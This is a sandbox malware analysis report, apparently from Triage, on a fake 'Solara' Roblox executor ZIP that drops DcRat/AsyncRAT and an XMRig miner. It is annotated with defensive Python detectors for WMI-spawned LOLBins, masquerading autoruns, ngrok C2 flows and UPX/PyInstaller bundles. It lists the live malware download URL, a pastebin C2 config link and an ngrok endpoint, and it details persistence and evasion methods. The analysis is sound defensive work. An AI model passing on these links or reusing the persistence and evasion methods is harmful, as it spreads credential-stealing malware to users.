Resubmissions
  24-10-2024 19:59  241024-yqt7dsscpl  score 6
  24-10-2024 19:55  241024-yndfvssclj  score 10
  24-10-2024 19:54  241024-ymwk2ssckm  score 8
  24-10-2024 12:40  241024-pwm6la1hmn  score 10
  24-10-2024 12:34  241024-psafbs1gkr  score 10
  24-10-2024 12:24  241024-pk4zza1drl  score 10
  22-10-2024 13:05  241022-qbwsnsybrr  score 10

Analysis
  max time kernel: 299s
  max time network: 300s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 24-10-2024 12:34
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Resource: win10v2004-20241007-en

General
Target: https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Malware Config
Extracted
  Family: asyncrat
  Version: 1.0.7
  Botnet: Roblox
  Mutex: DcRatMutex_qwqdanchun
  Attributes:
    delay: 1
    install: true
    install_file: svchost.exe
    install_folder: %AppData%
    pastebin_config: https://pastebin.com/raw/rACMKa5f
  No host:port pair is embedded in the binary: with pastebin_config set, the client fetches its C2 endpoint from the paste at run time, which is why the network flows further down show pastebin.com before the ngrok tunnel. The mutex is the default emitted by the DcRat builder and matches the DcRat signature below; DcRat is an AsyncRAT derivative with the same configuration layout, so the two family labels on this page are not in conflict.
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
Processes: RunShell.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell by RunShell.exe, six times, each write appending one more path. The value normally holds only explorer.exe; Winlogon launches every program listed in it at logon. Final value:
    explorer.exe,
    "C:\Program Files\Windows Portable Devices\RuntimeBroker.exe",
    "C:\agentComponentFontNet\System.exe",
    "C:\Recovery\WindowsRE\msedge.exe",
    "C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe",
    "C:\agentComponentFontNet\TrustedInstaller.exe",
    "C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"
  The five intermediate values recorded are explorer.exe followed by the first 1, 2, 3, 4 and 5 of these paths.
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro. Here, however, the parent is WmiPrvSE.exe, the WMI provider host: a process created through WMI (Win32_Process.Create) is parented by WmiPrvSE rather than by the caller, so these rows are consistent with the sample registering its scheduled tasks via WMI to hide the real parent, not with an exploited provider host.
Processes: schtasks.exe (18 instances)
  Parent C:\Windows\system32\wbem\wmiprvse.exe (pid 2952) is not expected to spawn schtasks.exe; child pids: 6740, 400, 6696, 1844, 2244, 7088, 4428, 6832, 1664, 6776, 7044, 7032, 6540, 6348, 6352, 1712, 5680, 6972
-
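Detection logic for this pattern, added here as an example and not part of the Triage report: it reads Sysmon-style process-creation records, keeps the children of wmiprvse.exe that are script hosts or LOLBins, and pulls the task name and action out of each schtasks /create command line. The events are constructed: pids and images follow the rows above, but the command lines, the task names (ExampleTaskA/B) and wmiprvse's own parent pid are assumptions, since the report does not show them.

```python
"""Flag LOLBins launched by the WMI provider host, as in the schtasks rows above."""
import re

# Children a WMI provider host should never launch on its own. When one shows up
# under wmiprvse.exe, some WMI client called Win32_Process.Create: the new process
# is parented by WmiPrvSE, not by the caller, which hides the real ancestry.
SUSPICIOUS_CHILDREN = {
    "schtasks.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# schtasks switches: /tn <name> and /tr <action>, quoted or bare, any case.
_TN = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
_TR = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_schtasks(cmdline):
    """Return (task name, task action) from a 'schtasks /create' line, else (None, None)."""
    if "/create" not in cmdline.lower():
        return None, None
    tn, tr = _TN.search(cmdline), _TR.search(cmdline)
    name = (tn.group(1) or tn.group(2)) if tn else None
    action = (tr.group(1) or tr.group(2)) if tr else None
    return name, action


def find_wmi_spawns(events):
    """events: Sysmon EID 1 style dicts with pid, ppid, image, cmdline.
    Returns one finding per suspicious child of wmiprvse.exe, in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) != "wmiprvse.exe":
            continue
        child = _basename(e["image"])
        if child not in SUSPICIOUS_CHILDREN:
            continue
        f = {"pid": e["pid"], "ppid": e["ppid"], "child": child, "cmdline": e["cmdline"]}
        if child == "schtasks.exe":
            f["task_name"], f["task_action"] = parse_schtasks(e["cmdline"])
        findings.append(f)
    return findings


# Constructed events. Pids and images follow the report's rows; the command lines,
# the task names ExampleTaskA/B and wmiprvse's parent pid (760) are assumptions.
SAMPLE_EVENTS = [
    {"pid": 2952, "ppid": 760, "image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
    {"pid": 6740, "ppid": 2952, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "ExampleTaskA" /sc MINUTE /mo 5 '
                r'/tr "C:\Program Files\Windows Portable Devices\RuntimeBroker.exe" /f'},
    {"pid": 400, "ppid": 2952, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "ExampleTaskB" /sc ONLOGON /rl HIGHEST '
                r'/tr "C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe" /f'},
    {"pid": 5096, "ppid": 6064, "image": r"C:\Windows\system32\tasklist.exe",
     "cmdline": "tasklist"},
]

if __name__ == "__main__":
    for f in find_wmi_spawns(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['child']} <- wmiprvse.exe pid {f['ppid']}: "
              f"task={f.get('task_name')} action={f.get('task_action')}")
```

The same loop applied to real Sysmon or EDR telemetry should treat a schtasks child of WmiPrvSE as high-confidence: the provider host has no legitimate reason to create a task, and the /tr value gives the persistence target to pull immediately.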
Async RAT payload 1 IoCs
Processes:
  resource: C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe  yara_rule: family_asyncrat
-
Processes (dcrat yara rule matches, 4 IoCs):
  resource: C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe  yara_rule: dcrat
  resource: C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe  yara_rule: dcrat
  resource: behavioral1/memory/6884-605-0x00000000001B0000-0x0000000000326000-memory.dmp  yara_rule: dcrat  (pid 6884 is containerRuntime.exe, see "Executes dropped EXE")
  resource: behavioral1/memory/6508-666-0x0000000000760000-0x00000000008EA000-memory.dmp  yara_rule: dcrat  (pid 6508 is MsHyperPort.exe)
  Every matched file sits under %AppData%\Roaming\Windows\Defender and carries a Microsoft Defender-style name. The genuine Defender binaries live under C:\Program Files\Windows Defender or C:\ProgramData\Microsoft\Windows Defender\Platform and are Microsoft-signed; a Defender-named executable in a user-writable profile directory is a masquerade regardless of the name.
-
XMRig Miner payload 1 IoCs
Processes:
  resource: behavioral1/memory/6624-862-0x0000000140000000-0x0000000140786000-memory.dmp  yara_rule: xmrig
  Pid 6624 is the explorer.exe whose thread context GoogleUpdater.exe (pid 7108) rewrote (see "Suspicious use of SetThreadContext"). The miner image at 0x140000000 was observed only in that hollowed explorer.exe; no on-disk file matched the xmrig rule.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes: powershell.exe (17 instances)
  pids: 4136, 6764, 4912, 5308, 6148, 5264, 1896, 6944, 6288, 3592, 3764, 5944, 5500, 6796, 4712, 2544, 6444
-
Drops file in Drivers directory 3 IoCs
Processes: attrib.exe, MpWinDefenderService.exe, attrib.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  MpWinDefenderService.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
  attrib.exe only changes file attributes (it cannot edit content), so the MpWinDefenderService.exe open is the one candidate for a content write; diff the hosts file against a known-good copy before trusting name resolution on the host.
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: reg.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  reg.exe
-
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: MpCmdRun.exe, WScript.exe, GoogleUpdater.exe, WinSFX.exe, WinDefender.exe, MpDefenderCoreService.exe, RunShell.exe, WScript.exe, WScript.exe, MpWinSDK.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation  by each of the ten processes above (three separate WScript.exe instances)
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Drops startup file 2 IoCs
Processes: javaw.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSFX.exe  javaw.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSFX.exe  javaw.exe
-
Executes dropped EXE 17 IoCs
Processes:
  pid   process
  6068  WinSFX.exe
  5276  MpWinHelper32.exe
  5552  WinDefender.exe
  5304  MpDefenderRuntime.exe
  5748  MpWinDefenderService.exe
  5804  MpWinDefenderService.exe
  5312  MpDefenderCoreService.exe
  5912  MpCmdRun.exe
  5932  MpWinSDK.exe
  6884  containerRuntime.exe
  5688  RunShell.exe
  6508  MsHyperPort.exe
  7068  svchost.exe
  4192  rar.exe
  7108  GoogleUpdater.exe
  6872  sihost64.exe
  6496  RunShell.exe
-
Loads dropped DLL 17 IoCs
Processes: javaw.exe, MpWinDefenderService.exe
  5472  javaw.exe                 (1 load)
  5804  MpWinDefenderService.exe  (16 loads)
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes: RunShell.exe
  Set value (str) by RunShell.exe under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
    System            = "C:\agentComponentFontNet\System.exe"
    msedge            = "C:\Recovery\WindowsRE\msedge.exe"
    RuntimeBroker     = "C:\Program Files\Windows Portable Devices\RuntimeBroker.exe"
    lsass             = "C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe"
    TrustedInstaller  = "C:\agentComponentFontNet\TrustedInstaller.exe"
    RunShell          = "C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"
  Set value (str) by RunShell.exe under \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the same six names with the same targets:
    TrustedInstaller, RunShell, System, msedge, lsass, RuntimeBroker
-
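An audit of the two autostart locations this sample writes (the Winlogon\Shell value and the Run keys), added as an example; it is not taken from the report or from the sample. It splits the Shell value into its entries, compares each target's file name against the directory where the genuine binary of that name lives, and flags anything executing from a user-writable or recovery path. The LEGIT_DIRS table is the example's own assumption about a default Windows 10 x64 layout; the registry values fed to it are the ones listed in the report.

```python
"""Audit Winlogon\\Shell and Run-key autostarts for masquerading binaries."""
import re

# Directories where the genuine binary of each name lives on Windows 10 x64. This
# table is an assumption of the example, not something the report states. An empty
# set means no Windows binary of that name exists, so any hit is suspect.
LEGIT_DIRS = {
    "explorer.exe": {r"c:\windows", ""},   # bare "explorer.exe" is the default Shell value
    "lsass.exe": {r"c:\windows\system32"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "trustedinstaller.exe": {r"c:\windows\servicing"},
    "msedge.exe": {r"c:\program files (x86)\microsoft\edge\application",
                   r"c:\program files\microsoft\edge\application"},
    "system.exe": set(),
}
USER_WRITABLE = ("\\appdata\\roaming", "\\appdata\\local\\temp", "\\recovery\\", "\\users\\public")

# One Shell entry: a quoted path or a bare token, followed by a comma or end of value.
_ENTRY = re.compile(r'\s*(?:"([^"]*)"|([^,"]+?))\s*(?:,|$)')


def split_shell_value(value):
    """Split the comma-separated Winlogon\\Shell value into its executables."""
    return [q or b for q, b in _ENTRY.findall(value) if q or b]


def classify(target):
    """Reasons an autostart target looks malicious; an empty list means clean."""
    norm = target.strip().strip('"').replace("/", "\\").lower()
    directory, _, name = norm.rpartition("\\")
    reasons = []
    if name in LEGIT_DIRS and directory not in LEGIT_DIRS[name]:
        if LEGIT_DIRS[name]:
            reasons.append(f"{name} outside its legitimate directory")
        else:
            reasons.append(f"no Windows binary named {name} exists")
    if any(seg in norm for seg in USER_WRITABLE):
        reasons.append("runs from a user-writable or recovery location")
    return reasons


def audit_autoruns(shell_value, run_values):
    """run_values: {registry value path: command}. Returns flagged (source, target, reasons)."""
    flagged = []
    for entry in split_shell_value(shell_value):
        if reasons := classify(entry):
            flagged.append(("Winlogon\\Shell", entry, reasons))
    for key, command in run_values.items():
        if reasons := classify(command):
            flagged.append((key, command, reasons))
    return flagged


# Values as recorded in the report (final Shell value and the HKLM/HKCU Run entries).
SHELL_VALUE = (
    'explorer.exe, "C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe", '
    '"C:\\agentComponentFontNet\\System.exe", "C:\\Recovery\\WindowsRE\\msedge.exe", '
    '"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe", '
    '"C:\\agentComponentFontNet\\TrustedInstaller.exe", '
    '"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe"'
)
RUN_VALUES = {
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System": r'"C:\agentComponentFontNet\System.exe"',
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge": r'"C:\Recovery\WindowsRE\msedge.exe"',
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker": r'"C:\Program Files\Windows Portable Devices\RuntimeBroker.exe"',
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass": r'"C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe"',
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller": r'"C:\agentComponentFontNet\TrustedInstaller.exe"',
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell": r'"C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"',
}

if __name__ == "__main__":
    for source, target, reasons in audit_autoruns(SHELL_VALUE, RUN_VALUES):
        print(f"{source}: {target}\n    " + "; ".join(reasons))
```

On a live host the same two inputs come from `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell` and the two Run keys; the name-versus-directory check is what catches this family, because every dropped file borrows a Windows or Defender binary name.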
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: javaw.exe
  File opened (read-only)  \??\F:  javaw.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
Processes:
  flow  ioc
  3     raw.githubusercontent.com
  7     raw.githubusercontent.com
  49    discord.com
  51    discord.com
  52    discord.com
  59    raw.githubusercontent.com
  61    raw.githubusercontent.com
  80    pastebin.com
  81    pastebin.com
  430   2.tcp.eu.ngrok.io
  473   2.tcp.eu.ngrok.io
  516   2.tcp.eu.ngrok.io
  2.tcp.eu.ngrok.io is an ngrok TCP tunnel endpoint: the operator's C2 is reached through a reverse tunnel and the origin host is not visible from this traffic. The pastebin.com flows (80, 81) precede the tunnel flows, matching the pastebin_config attribute in the extracted configuration, so the paste is where the tunnel address came from.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  45    api.ipify.org
  46    api.ipify.org
  47    ip-api.com
  88    ip-api.com
-
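A classifier for the destinations in these two signatures, added as an example rather than taken from the report: it recognises ngrok TCP tunnel hostnames (and extracts the tunnel number and region), labels the other hosts, and orders the flows so the config fetch is seen to precede the tunnel. The category labels and the US default for unqualified ngrok hostnames are this example's assumptions; the flow ids and hostnames are the report's.

```python
"""Classify sandbox flow destinations into the abuse categories seen in RAT traffic."""
import re

# ngrok TCP tunnel endpoints look like N.tcp.ngrok.io (US) or N.tcp.<region>.ngrok.io.
# Treating a missing region as "us" is this example's assumption.
NGROK_TCP = re.compile(r"^(?P<n>\d+)\.tcp\.(?:(?P<region>[a-z]{2})\.)?ngrok\.io$")

# Category labels are this example's own; the hosts are those in the report.
KNOWN_HOSTS = {
    "raw.githubusercontent.com": "payload hosting (code repository)",
    "pastebin.com": "config retrieval (paste site)",
    "discord.com": "hosting/C2 (chat platform)",
    "api.ipify.org": "external IP lookup",
    "ip-api.com": "external IP lookup",
}


def classify_host(host):
    """Return (category, detail) for one destination hostname."""
    host = host.strip().lower().rstrip(".")
    m = NGROK_TCP.match(host)
    if m:
        region = m.group("region") or "us"
        return "reverse tunnel C2", f"ngrok tcp tunnel #{m.group('n')}, region {region}"
    if host in KNOWN_HOSTS:
        return KNOWN_HOSTS[host], ""
    return "unclassified", ""


def timeline(flows):
    """flows: iterable of (flow_id, host). Returns (flow_id, host, category, detail) by flow id."""
    return [(fid, host, *classify_host(host)) for fid, host in sorted(flows)]


def first_contact(flows):
    """Flow id of the first flow in each category, to order the stages (config fetch before C2)."""
    first = {}
    for fid, host, cat, _ in timeline(flows):
        first.setdefault(cat, fid)
    return first


# Constructed from the flow/ioc rows of the two signatures above.
SAMPLE_FLOWS = [
    (51, "discord.com"), (52, "discord.com"), (59, "raw.githubusercontent.com"),
    (81, "pastebin.com"), (473, "2.tcp.eu.ngrok.io"), (3, "raw.githubusercontent.com"),
    (7, "raw.githubusercontent.com"), (49, "discord.com"), (61, "raw.githubusercontent.com"),
    (80, "pastebin.com"), (430, "2.tcp.eu.ngrok.io"), (516, "2.tcp.eu.ngrok.io"),
    (45, "api.ipify.org"), (46, "api.ipify.org"), (47, "ip-api.com"), (88, "ip-api.com"),
]

if __name__ == "__main__":
    for fid, host, cat, detail in timeline(SAMPLE_FLOWS):
        print(f"{fid:>4}  {host:<28} {cat}" + (f"  [{detail}]" if detail else ""))
    print(first_contact(SAMPLE_FLOWS))
```

The ngrok regex is the piece worth lifting into a DNS or proxy detection: tunnel hostnames are numbered per region, so a rule on `\d+\.tcp\.(eu|ap|au|sa|jp|in\.)?ngrok\.io` catches the endpoint whatever tunnel number the operator is assigned.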
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 6 IoCs
Processes: GoogleUpdater.exe, csc.exe, MpWinHelper32.exe
  File created                  C:\Windows\system32\Microsoft\Libs\WR64.sys                       GoogleUpdater.exe
  File created                  \??\c:\Windows\System32\CSCB59BB1DD46334AD8911ABF5DB637A37.TMP   csc.exe
  File created                  \??\c:\Windows\System32\enb1sa.exe                               csc.exe
  File created                  C:\Windows\system32\GoogleUpdater.exe                            MpWinHelper32.exe
  File opened for modification  C:\Windows\system32\GoogleUpdater.exe                            MpWinHelper32.exe
  File created                  C:\Windows\system32\Microsoft\Libs\sihost64.exe                  GoogleUpdater.exe
  csc.exe is the .NET C# compiler, so enb1sa.exe was compiled on the host at run time rather than dropped as-is. WR64.sys is a kernel driver written by the component that later hollows explorer.exe with the miner; XMRig's MSR tuning depends on a driver (WinRing0), and the LoadsDriver event (pid 656) further down should be matched against this file. Whether WR64.sys is that driver needs the file hash, which the report does not show.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes: tasklist.exe (4 instances)
  pids: 5096, 5704, 6676, 6412
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes: GoogleUpdater.exe
  PID 7108 (GoogleUpdater.exe) set thread context of PID 6624 (explorer.exe)
  Read together with the xmrig yara hit on a memory dump of pid 6624 (image base 0x140000000), this is process hollowing: an explorer.exe started suspended whose initial thread is redirected into the injected miner.
-
Processes (upx yara rule matches):
  resource: the following files under C:\Users\Admin\AppData\Local\Temp\_MEI57482\, each matching yara_rule upx:
    python313.dll, _ctypes.pyd, libffi-8.dll, _ssl.pyd, _sqlite3.pyd, _socket.pyd, _queue.pyd, _lzma.pyd, _hashlib.pyd, _decimal.pyd, _bz2.pyd, unicodedata.pyd, sqlite3.dll, select.pyd, libssl-3.dll, libcrypto-3.dll
  resource: behavioral1/memory/5804-<index>-<range>-memory.dmp, yara_rule upx, for pid 5804 (MpWinDefenderService.exe) at dump indexes 383 through 1232, covering these 15 mapped ranges (several dumped more than once):
    0x00007FFD27AE0000-0x00007FFD28013000
    0x00007FFD290B0000-0x00007FFD2917E000
    0x00007FFD2F5C0000-0x00007FFD2F5F4000
    0x00007FFD30E60000-0x00007FFD30E8B000
    0x00007FFD31030000-0x00007FFD31693000
    0x00007FFD31B50000-0x00007FFD31B69000
    0x00007FFD31BB0000-0x00007FFD31BD7000
    0x00007FFD32BE0000-0x00007FFD32BF9000
    0x00007FFD32C00000-0x00007FFD32D7F000
    0x00007FFD32D80000-0x00007FFD32DA5000
    0x00007FFD32E00000-0x00007FFD32EB3000
    0x00007FFD42C50000-0x00007FFD42C5D000
    0x00007FFD470F0000-0x00007FFD470FF000
    0x00007FFD482C0000-0x00007FFD482D4000
    0x00007FFD485B0000-0x00007FFD485BD000
  The _MEI temp directory and python313.dll are the run-time extraction layout of a PyInstaller one-file bundle built on Python 3.13. The upx hits are on the bundled interpreter DLLs and extension modules, and the sixteen files match the sixteen DLL loads by pid 5804 under "Loads dropped DLL": 5748 and 5804 are the parent/child pair a one-file bundle produces (the parent extracts, the child runs), so MpWinDefenderService.exe is a UPX-packed PyInstaller executable.
-
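Static checks for the two facts these rows reveal, added as an example (not from the report): a PE section-table walk that spots UPX section names, and a decoder for the PyInstaller CArchive cookie, the 88-byte `!8sIIii64s` trailer that PyInstaller 2.1 and later append to a one-file bundle, which recovers the Python version and interpreter DLL name. The bytes scanned are a constructed stand-in built by build_sample(), not the dropped files, which the report does not provide.

```python
"""Spot UPX-packed PE files and PyInstaller one-file bundles from raw bytes."""
import struct

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"   # CArchive cookie magic (PyInstaller >= 2.1)
COOKIE_FMT = "!8sIIii64s"                         # magic, package len, TOC offset, TOC len, pyvers, pylib
COOKIE_LEN = struct.calcsize(COOKIE_FMT)          # 88 bytes


def pe_section_names(data):
    """Return the section names of a PE image, or [] if the headers do not parse."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if pe_off + 24 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return []
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size                # section headers follow the optional header
    names = []
    for i in range(n_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]   # IMAGE_SECTION_HEADER is 40 bytes, name first
        if len(raw) < 8:
            break
        names.append(bytes(raw).rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(data):
    """UPX renames sections to UPX0/UPX1 and leaves a 'UPX!' pack header."""
    return any(n.startswith("UPX") for n in pe_section_names(data)) or b"UPX!" in data


def pyinstaller_cookie(data):
    """Locate the CArchive cookie (normally the file's last 88 bytes) and decode it."""
    idx = data.rfind(PYINSTALLER_MAGIC)
    if idx < 0 or idx + COOKIE_LEN > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, idx)
    return {
        "package_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
        "python_version": f"{pyvers // 100}.{pyvers % 100}",   # pyvers = major*100 + minor
        "python_lib": pylib.rstrip(b"\0").decode("ascii", "replace"),
    }


def build_sample():
    """Constructed stand-in: a minimal MZ/PE header with UPX section names and a
    PyInstaller cookie appended. Enough to exercise the parsers; not a real binary."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)       # e_lfanew: PE header at 0x40
    pe = bytearray(24)                            # signature + IMAGE_FILE_HEADER
    pe[:4] = b"PE\0\0"
    struct.pack_into("<H", pe, 6, 2)              # NumberOfSections
    struct.pack_into("<H", pe, 20, 0)             # SizeOfOptionalHeader (omitted here)
    sections = b"UPX0".ljust(8, b"\0") + bytes(32) + b"UPX1".ljust(8, b"\0") + bytes(32)
    cookie = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, 4096, 1024, 512, 313, b"python313.dll")
    return bytes(hdr + pe + sections + bytes(64) + cookie)


if __name__ == "__main__":
    blob = build_sample()
    print("sections:", pe_section_names(blob), "upx:", is_upx_packed(blob))
    print("pyinstaller:", pyinstaller_cookie(blob))
```

Run against the real dropper the cookie gives the Python version to pick the matching pyc decompiler, and the UPX check tells you to unpack (`upx -d`) before any static signature will match; both are cheap triage steps that the sandbox's _MEI directory listing only hints at.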
Drops file in Program Files directory 4 IoCs
Processes: RunShell.exe
  File created  C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe        RunShell.exe
  File created  C:\Program Files\Windows Security\BrowserCore\en-US\6203df4a6bafc7   RunShell.exe
  File created  C:\Program Files\Windows Portable Devices\RuntimeBroker.exe          RunShell.exe
  File created  C:\Program Files\Windows Portable Devices\9e8d7a4ca61bd9             RunShell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes: netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  All three rows are reads: netsh.exe enumerates this key on every start to load its registered helper DLLs. No write to the key is recorded, so this is netsh being run (compare the Wi-Fi discovery signature below), not a helper DLL being registered for persistence.
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: WinSFX.exe, WScript.exe, WinDefender.exe, MpCmdRun.exe, WScript.exe, Solara NEW.exe, MpDefenderCoreService.exe, WScript.exe, cmd.exe, cmd.exe, cmd.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by each of the eleven processes above
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes: cmd.exe, PING.EXE
  pid 6064  cmd.exe
  pid 2260  PING.EXE
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: firefox.exe (three instances)
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      firefox.exe  (3 times)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier     firefox.exe  (2 times)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  firefox.exe  (2 times)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz                 firefox.exe  (3 times)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision      firefox.exe  (1 time)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature     firefox.exe  (1 time)
  All twelve reads come from firefox.exe. The target of this task is a URL, so the sandbox drives browsers (firefox, chrome and msedge appear throughout the report); CPU and BIOS lookups by those browsers are ordinary browser telemetry, not the sample's evasion. The reg.exe query of SystemBiosVersion above is the better candidate for the sample's own check.
-
Delays execution with timeout.exe 1 IoCs
Processes: timeout.exe
  pid 1300  timeout.exe
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes: chrome.exe, msedge.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
